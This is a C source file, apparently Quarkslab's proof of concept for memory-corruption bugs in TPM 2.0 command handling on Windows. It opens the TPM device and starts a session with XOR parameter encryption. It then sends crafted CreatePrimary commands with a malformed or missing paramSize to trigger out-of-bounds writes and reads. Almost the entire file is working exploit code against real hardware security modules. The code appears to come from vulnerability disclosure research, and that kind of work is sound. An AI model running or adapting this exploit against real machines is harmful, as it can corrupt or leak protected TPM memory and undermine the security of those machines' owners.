/*
# BSD 2-Clause License
#
# Copyright (c) 2022, Quarkslab SAS
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
#    list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
#    this list of conditions and the following disclaimer in the documentation
#    and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

#include <Windows.h>
#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include "Tpm.h"


#define BUFSIZE 0x20000
#define TPM_IOCTL_SUBMIT_COMMAND_BLOCKING 0x22C00C



void hexdump(void* abuffer, unsigned int buflen) {
	unsigned int offset = 0;
	unsigned int i, charcount, totalcount = 0, linepos = 0;
	unsigned char* buf = (unsigned char*)abuffer;

	printf("offset\t\t00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F\t\tdump\n");

	for (i = 0; i < buflen / 0x10; i++) {
		printf("0x%08x\t", offset);
		offset += 0x10;
		charcount = 0;
		linepos = totalcount;
		while ((charcount < 0x10) && (totalcount < buflen)) {
			printf("%02x ", buf[totalcount]);
			totalcount++;
			charcount++;
		}
		printf("\t");
		for (unsigned int k = 0; k < 0x10; k++) {
			if (isprint(buf[linepos])) {
				printf("%c", buf[linepos]);
			}
			else {
				printf(".");
			}
			linepos++;
		}
		printf("\n");
	}

	linepos = totalcount;
	if (buflen % 0x10) {
		printf("0x%08x\t", offset);
		offset += 0x10;
		charcount = 0;
		while (charcount < buflen % 0x10) {
			printf("%02x ", buf[totalcount + charcount]);
			charcount++;

		}
		for (i = 0; i < 0x10 - (buflen % 0x10); i++) {
			printf("   ");
		}
		printf("\t");
		for (i = 0; i < buflen % 0x10; i++) {
			if (isprint(buf[linepos])) {
				printf("%c", buf[linepos]);
			}
			else {
				printf(".");
			}
			linepos++;
		}
		printf("\n");
	}
	printf("\n");
}


HANDLE open_tpm() {
	HANDLE hDevice;

	hDevice = CreateFile(L"\\??\\TPM", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL, OPEN_EXISTING, 0, NULL);
	if (hDevice == INVALID_HANDLE_VALUE) {
		printf("[-] CreateFile failed, last error: %d\n", GetLastError());
	}
	else {
		printf("[+] CreateFile succeeded, hFile: 0x%llx\n", (unsigned long long)hDevice);
	}
	return hDevice;
}


unsigned char* send_tpm_message(HANDLE hDevice, void* message, UINT32 message_size, DWORD* byteswritten) {
	unsigned char* buf;

	if (message_size > BUFSIZE) {
		printf("[-] message_size > 0x%x\n", BUFSIZE);
		return NULL;
	}

	buf = (unsigned char*)malloc(BUFSIZE);
	if (!buf) {
		printf("[-] malloc failed.\n");
		return NULL;
	}

	memcpy(buf, message, message_size);
	if (DeviceIoControl(hDevice, TPM_IOCTL_SUBMIT_COMMAND_BLOCKING, buf, message_size, buf, BUFSIZE, byteswritten, NULL)) {
		printf("[+] DeviceIoControl succeeded. byteswritten = 0x%x\n", *byteswritten);
		printf("Raw response:\n");
		hexdump(buf, *byteswritten);
		return buf;
	}
	else {
		printf("[-] DeviceIoControl failed, last error: %d\n", GetLastError());
		free(buf);
		return NULL;
	}
}


DWORD get_tpm_property(HANDLE hDevice, TPM_PT property) {
	TPM_PROP_RESPONSE *response;
	TPM_PROP tpm_prop;
	DWORD byteswritten;

	printf("Getting TPM property 0x%08x...\n", property);
	memset(&tpm_prop, 0, sizeof(tpm_prop));
	tpm_prop.base.tag = htons(0x0201);				     // TPM_ST_NO_SESSIONS
	tpm_prop.base.size = htonl(sizeof(tpm_prop));
	tpm_prop.base.command = htonl(TPM_CC_GetCapability);
	tpm_prop.capability = htonl(TPM_CAP_TPM_PROPERTIES);
	tpm_prop.property = htonl(property);
	tpm_prop.property_count = htonl(1);
	response = (TPM_PROP_RESPONSE *)send_tpm_message(hDevice, &tpm_prop, sizeof(tpm_prop), &byteswritten);
	if (byteswritten < sizeof(TPM_PROP_RESPONSE)) {
		printf("[-] Response length (0x%x) < sizeof(TPM_PROP_RESPONSE) (0x%llx)\n", byteswritten, sizeof(TPM_PROP_RESPONSE));
		return 0;
	}
	if (ntohl(response->base.command != 0)) {
		printf("[-] TPM_CC_GetCapability returned error 0x%x\n", ntohl(response->base.command));
		return 0;
	}
	return ntohl(response->capabilityData.data.tpmProperties.tpmProperty[0].value);
}

unsigned char* poc_oob_write(HANDLE hDevice, DWORD sessionHandle, DWORD max_command_size, DWORD* byteswritten) {
	char* buf;
	CREATE_PRIMARY create_primary;

	/*
	0x02, 0x02,             // TPM_ST_SESSIONS
	0x00, 0x00, 0x10, 0x00, // total size = 0x1000
	0x00, 0x00, 0x01, 0x31,	// command = TPM_CC_CreatePrimary
	0x40, 0x00, 0x00, 0x01, // handle = TPM_RH_OWNER
	0x00, 0x00, 0x00, 0x09, // authorization size

	// session area
	// TPMS_AUTH_COMMAND struct starts here
	0x02, 0x00, 0x00, 0x00, // sessionHandle
	0x00, 0x00,				// nonce size
	// no nonceCaller (0 bytes)
	0x20,					// session attributes = decrypt
	0x00, 0x00,				// authValue (PW or HMAC)

	// Parameters for the command
	0x0f, 0xe5				// paramSize
							// parameters should follow
	*/

	memset(&create_primary, 0, sizeof(create_primary));
	create_primary.base.tag = htons(0x0202);								// TPM_ST_SESSIONS
	create_primary.base.command = htonl(TPM_CC_CreatePrimary);
	create_primary.base.size = htonl(max_command_size);								// maximum length
	create_primary.handle = htonl(TPM_RH_OWNER);

	create_primary.authorizationSize = htonl(sizeof(TPMS_AUTH_COMMAND));
	create_primary.authCommand.sessionHandle = htonl(sessionHandle);
	create_primary.authCommand.nonceSize = htons(0x0000);					// no nonce
	create_primary.authCommand.sessionAttributes.decrypt = 1;				// signal than parameters must be encrypted
	create_primary.authCommand.authValue = htons(0x0000);
	create_primary.paramSize = htons(max_command_size - sizeof(create_primary) + 2);  // 0x1000 - sizeof(create_primary) + 2

	if (max_command_size < sizeof(create_primary)) {
		printf("[-] max_command_size is too small.\n");
		return NULL;
	}

	buf = (char*)malloc(max_command_size);
	if (!buf) {
		printf("- malloc failed.\n");
		return NULL;
	}
	memset(buf, 0x41, max_command_size);
	memcpy(buf, &create_primary, sizeof(create_primary));
	hexdump(buf, max_command_size);

	return send_tpm_message(hDevice, buf, max_command_size, byteswritten);

}


unsigned char* poc_oob_read(HANDLE hDevice, DWORD sessionHandle, DWORD* byteswritten) {
	SHORT_CREATE_PRIMARY short_create_primary;

	memset(&short_create_primary, 0, sizeof(short_create_primary));
	short_create_primary.base.tag = htons(0x0202);									// TPM_ST_SESSIONS
	short_create_primary.base.command = htonl(TPM_CC_CreatePrimary);
	short_create_primary.base.size = htonl(sizeof(short_create_primary));
	short_create_primary.handle = htonl(TPM_RH_OWNER);

	short_create_primary.authorizationSize = htonl(sizeof(TPMS_AUTH_COMMAND));		// 9, the bare minimum
	short_create_primary.authCommand.sessionHandle = htonl(sessionHandle);
	short_create_primary.authCommand.nonceSize = htons(0x0000);						// no nonce
	short_create_primary.authCommand.sessionAttributes.decrypt = 1;					// parameters must be decrypted
	short_create_primary.authCommand.authValue = htons(0x0000);
	// missing 'paramSize' here!

	printf("short_create_primary struct (size: 0x%llx):\n", sizeof(short_create_primary));
	hexdump(&short_create_primary, sizeof(short_create_primary));

	return send_tpm_message(hDevice, &short_create_primary, sizeof(short_create_primary), byteswritten);

}


AUTH_RESPONSE* create_session_symmetric_xor(HANDLE hDevice, DWORD* byteswritten) {
	AUTH_RESPONSE* auth_response = NULL;
	CREATE_SESSION create_session;

	memset(&create_session, 0, sizeof(create_session));
	create_session.base.tag = htons(0x0201);			// TPM_ST_NO_SESSIONS
	create_session.base.size = htonl(sizeof(create_session));
	create_session.base.command = htonl(TPM_CC_StartAuthSession);

	create_session.tpmKey = htonl(TPM_RH_NULL);
	create_session.bind = htonl(TPM_RH_NULL);
	create_session.nonceCallerLength = htons(0x20);
	memset(&create_session.nonceCaller, 0x41, sizeof(create_session.nonceCaller));
	create_session.encryptedSaltLength = htons(0x0000);
	create_session.sessionType = 0x00;					// session type = TPM_SE_HMAC
	create_session.symmetricAlgorithm = htons(TPM_ALG_XOR);
	create_session.symmetricKeyBits = htons(TPM_ALG_SHA256);
	create_session.authHash = htons(TPM_ALG_SHA256);

	hexdump(&create_session, sizeof(create_session));

	auth_response = (AUTH_RESPONSE*)send_tpm_message(hDevice, &create_session, sizeof(create_session), byteswritten);
	if (!auth_response) {
		return NULL;
	}
	auth_response->tag = ntohs(auth_response->tag);
	auth_response->size = ntohl(auth_response->size);
	auth_response->responseCode = ntohl(auth_response->responseCode);
	auth_response->sessionHandle = ntohl(auth_response->sessionHandle);
	auth_response->nonceTPMSize = ntohs(auth_response->nonceTPMSize);
	return auth_response;
}


void print_vendor_info(HANDLE hDevice) {
	DWORD manufacturer, version1, version2;
	UINT16 *v1, *v2;
	char manufacturer_str[5];
	DWORD vendor_strings[4];
	unsigned int i;

	manufacturer = get_tpm_property(hDevice, TPM_PT_MANUFACTURER);

	for (i = 0; i < 4; i++) {
		vendor_strings[i] = get_tpm_property(hDevice, TPM_PT_VENDOR_STRING_1 + i);
	}

	version1 = get_tpm_property(hDevice, TPM_PT_FIRMWARE_VERSION_1);
	v1 = (UINT16*)&version1;
	version2 = get_tpm_property(hDevice, TPM_PT_FIRMWARE_VERSION_2);
	v2 = (UINT16*)&version2;

	manufacturer_str[4] = 0;		// just a null terminator for the string
	*(DWORD*)manufacturer_str = htonl(manufacturer);
	printf("\n=== Vendor information===\n");
	printf("\t[i] TPM manufacturer: 0x%08x (\"%s\")\n", manufacturer, (char*)&manufacturer_str);
	printf("\t[i] Vendor strings: [");

	for (i = 0; i < 4; i++) {
		printf("0x%08x ", vendor_strings[i]);
	}
	printf("] (\"");

	for (i = 0; i < 4; i++) {
		*(DWORD*)manufacturer_str = htonl(vendor_strings[i]);
		printf("%s", manufacturer_str);
	}
	printf("\")\n");

	printf("\t[i] Firmware version: [0x%08x 0x%08x] (\"%d.%d.%d.%d\")\n\n", version1, version2, \
		*(v1+1), *v1, *(v2+1), *v2);

}


int main(int argc, char** argv) {
	HANDLE hDevice;
	unsigned char* buf = NULL;
	DWORD response_size = 0, max_command_size;
	AUTH_RESPONSE* auth_response = NULL;
	POC_NUMBER poc_number;


	if (argc < 2) {
		printf("Usage: %s < oobread | oobwrite >\n", argv[0]);
		return 1;
	}

	if (!_strcmpi(argv[1], "oobread")) {
		poc_number = POC_OOB_READ;
	}
	else if (!_strcmpi(argv[1], "oobwrite")) {
		poc_number = POC_OOB_WRITE;
	}
	else {
		printf("[-] Unkown argument %s\n", argv[1]);
		return 1;
	}

	hDevice = open_tpm();
	if (hDevice == INVALID_HANDLE_VALUE) {
		return 1;
	}

	print_vendor_info(hDevice);

	printf("++++++ Creating session ++++++\n");
	auth_response = create_session_symmetric_xor(hDevice, &response_size);

	if (auth_response) {
		printf("Auth Response (0x%x bytes):\n", response_size);
		//hexdump(buf, response_size);
		printf("\tauth_response.responseCode: 0x%x\n", auth_response->responseCode);

		if (auth_response->responseCode != 0) {
			printf("responseCode != 0, something failed.\n");
			goto finish;
		}
		printf("\tauth_response.sessionHandle: 0x%x\n", auth_response->sessionHandle);
		printf("\tauth_response.nonce_size: 0x%x\n", auth_response->nonceTPMSize);
		printf("\tauth:response.nonce: \n");
		hexdump(&auth_response->nonceTPM, auth_response->nonceTPMSize);


		switch (poc_number) {
		case POC_OOB_WRITE:
			max_command_size = get_tpm_property(hDevice, TPM_PT_MAX_COMMAND_SIZE);
			if (max_command_size == 0) {
				printf("[-] Couldn't determine TPM_PT_MAX_COMMAND_SIZE, exiting.\n");
				goto finish;
			}
			printf("++++++ Trying OOB write PoC. Max command size: 0x%x ++++++\n", max_command_size);
			buf = poc_oob_write(hDevice, auth_response->sessionHandle, max_command_size, &response_size);
			break;
		case POC_OOB_READ:
			printf("++++++ Trying OOB read PoC... ++++++\n");
			buf = poc_oob_read(hDevice, auth_response->sessionHandle, &response_size);
			break;
		default:
			printf("[-] Unknown option.\n");
			break;
		}
	}


finish:
	if (buf) {
		free(buf);
	}
	if (auth_response) {
		free(auth_response);
	}
	CloseHandle(hDevice);
	return 0;
}

